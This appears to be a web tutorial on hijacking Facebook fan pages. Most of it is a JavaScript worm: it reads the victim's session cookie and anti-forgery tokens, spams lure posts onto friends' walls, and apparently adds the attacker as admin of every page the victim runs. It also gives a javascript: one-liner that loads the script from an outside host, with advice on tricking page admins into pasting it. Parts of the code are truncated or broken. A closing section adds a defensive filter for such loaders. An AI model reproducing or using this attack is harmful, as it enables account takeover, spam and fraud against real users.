
Facebook Fanpage Attack

Now let’s start the tutorial. First, we need to set up an exploit and a website to host it. If you already have hosting, great; otherwise there are a couple of free hosting websites that can be used for such purposes. I will cover that along with the tutorial.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

Things we shall need:

1. Facebook page hacking exploit.

2. A free hosting.

3. A key or script to run that "Facebook page hacking exploit".

4. Your Facebook email id.

5. Brain (A bit)

Step 1:

Copy the Below Code and Save It In A Notepad....

Search For Inferno19@gmail.com in the Code Below & Replace It With Your Facebook EMAIL ID

//These are to be posted as status messages

txt = "Hey See what i got!";

txtee = "Hey See what i got!";

alert("Please wait 10-15 seconds, that we can analyze your friends to boost pages fans! Then click 'OK'to continue!");

with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {


//comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1];

// comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\w]+)"/i)[1];

form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];

pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

with(xx = new XMLHttpRequest())

open("GET", "/ajax/browser/friends/?uid=" +

document.cookie.match(/c_user=(\d+)/)[1] +


onreadystatechange = function () {

//extracts list of friends

if (xx.readyState == 4 && xx.status == 200) {

m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");

//facebook returns list of friends images of the form of three numbers separated by _,

//the above regular expression extracts out the middle of the two

//(which infact is the userID of friend)

i = 0;


t = setInterval(function () {

if (i >= llimit )

return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)

if(i == 0) {//do it only once

with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),

setRequestHeader("X-Requested-With", null),

setRequestHeader("X-Requested", null),

onreadystatechange = function() {

if(ddddd.readyState == 4 && ddddd.status == 200) {

llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;



with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+


//I am not very sure on this one but it seems it adds as admin of all pages the user holds



}, send(null); //end of function to change the admins

// this one collects cookie as well as the personalized status update email address

// (a photo sent to that address is posted on the wall directly)


//following code does status update

//the code writes message represented by txt and txtee alternately on the wall of friends.

//txt and txtee are same though (may be author's mistake)



with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +

"&target_id=" + m[Math.floor(Math.random() * m.length)] +

//m is an array of id of friends (was created early in the script exec), choose a random friend

"&composer_id=" +

"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +

//comp, form, dt are (probably) XSRF prevention tokens





with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee +

"&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+

"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +



i += 1;

}, 2000);// 2000 milli-sec window, after which the script is executed again


}, send(null);


}, send(null);

Now Save the Notepad File as inferno19.js

Step 2:

Create a Free Hosting Account Somewhere on a Free Host & Upload Your jhakaas.js File There ... You Will Get a Link

For Example: http://abc.yourfilehost.com/inferno19.js

Step 3: The Viral Code Creation

javascript:(a = (b = document).createElement(“script”)).src = “http://abc.yourfilehost.com/inferno19.js“, b.body.appendChild(a); void(0)

Now You Just Have To Send This Code To The Admin Of The Page And Tell Him to Run it On The Page.. It’s Up to You How You Fool Him ...

Hint: You Can Give Him A Greed That After Running This Code He Will Get 1000's Of Fans or Something Like That...
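
A defensive counterpart to the Step 3 loader, added here and not part of the original post: a filter that a messaging or comment pipeline could run over submitted text to flag one-liners that create a script element, point it at a remote URL and insert it into the page. The function name, the finding labels and the sample list are assumptions made for this example; the first sample is the loader exactly as printed above, curly quotes included.

```javascript
// Added example: flag pasted snippets that load a remote script into the page.
// Blogs and chat clients "smarten" quotes in code, so normalise them first.
const SMART_QUOTES = /[\u201C\u201D\u2018\u2019]/g;

function inspectSnippet(text) {
  const s = text.replace(SMART_QUOTES, '"').replace(/\s+/g, " ").trim();
  const findings = [];

  // A javascript: URI is what the victim is asked to paste into the address bar.
  if (/^javascript\s*:/i.test(s)) findings.push("javascript-uri");
  // The snippet builds a <script> element at run time...
  if (/createElement\s*\(\s*["']script["']\s*\)/i.test(s)) findings.push("creates-script-element");
  // ...points it at an absolute or protocol-relative URL...
  const src = s.match(/\.src\s*=\s*["']\s*((?:https?:)?\/\/[^"'\s]+)/i);
  let remoteHost = null;
  if (src) {
    findings.push("remote-src");
    try {
      remoteHost = new URL(src[1], "https://placeholder.invalid").hostname;
    } catch (e) {
      remoteHost = null; // unparsable URL: keep the finding, drop the host
    }
  }
  // ...and attaches it to the document so the browser fetches and runs it.
  if (/\b(appendChild|insertBefore|append)\s*\(/.test(s)) findings.push("dom-insert");

  const loader = ["creates-script-element", "remote-src", "dom-insert"]
    .every((f) => findings.includes(f));
  return {
    block: loader,                                        // remote script loader
    selfXss: loader && findings.includes("javascript-uri"), // paste-and-run form
    remoteHost,
    findings,
  };
}

// Constructed sample inputs; the first is the loader as printed in Step 3.
const SAMPLES = [
  "javascript:(a = (b = document).createElement(\u201Cscript\u201D)).src = \u201Chttp://abc.yourfilehost.com/inferno19.js\u201C, b.body.appendChild(a); void(0)",
  "javascript:void(0)",
  "Hey See what i got!",
];

for (const sample of SAMPLES) {
  const r = inspectSnippet(sample);
  console.log(r.block ? "BLOCK" : "allow", r.remoteHost, r.findings.join(","));
}
```

Matching on structure (element creation, remote `src`, DOM insertion) rather than on one host name keeps the check useful when the hosting URL changes, and the `remoteHost` field gives responders a value to pivot on in proxy or DNS logs.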